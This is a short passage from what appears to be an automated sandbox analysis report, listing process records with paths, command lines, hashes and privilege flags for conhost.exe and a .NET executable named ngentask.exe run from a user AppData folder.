                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6da640000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Target ID:22
                        Start time:07:54:00
                        Start date:18/11/2022
                        Path:C:\Users\user\AppData\Local\ServiceHub\ngentask.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user\AppData\Local\ServiceHub\ngentask.exe
                        Imagebase:0xd60000
                        File size:85096 bytes
                        MD5 hash:ED7F195F7121781CC3D380942765B57D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:.Net C# or VB.NET

                        Target ID:23
                        Start time:07:54:01
                        Start date:18/11/2022
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6da640000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        No disassembly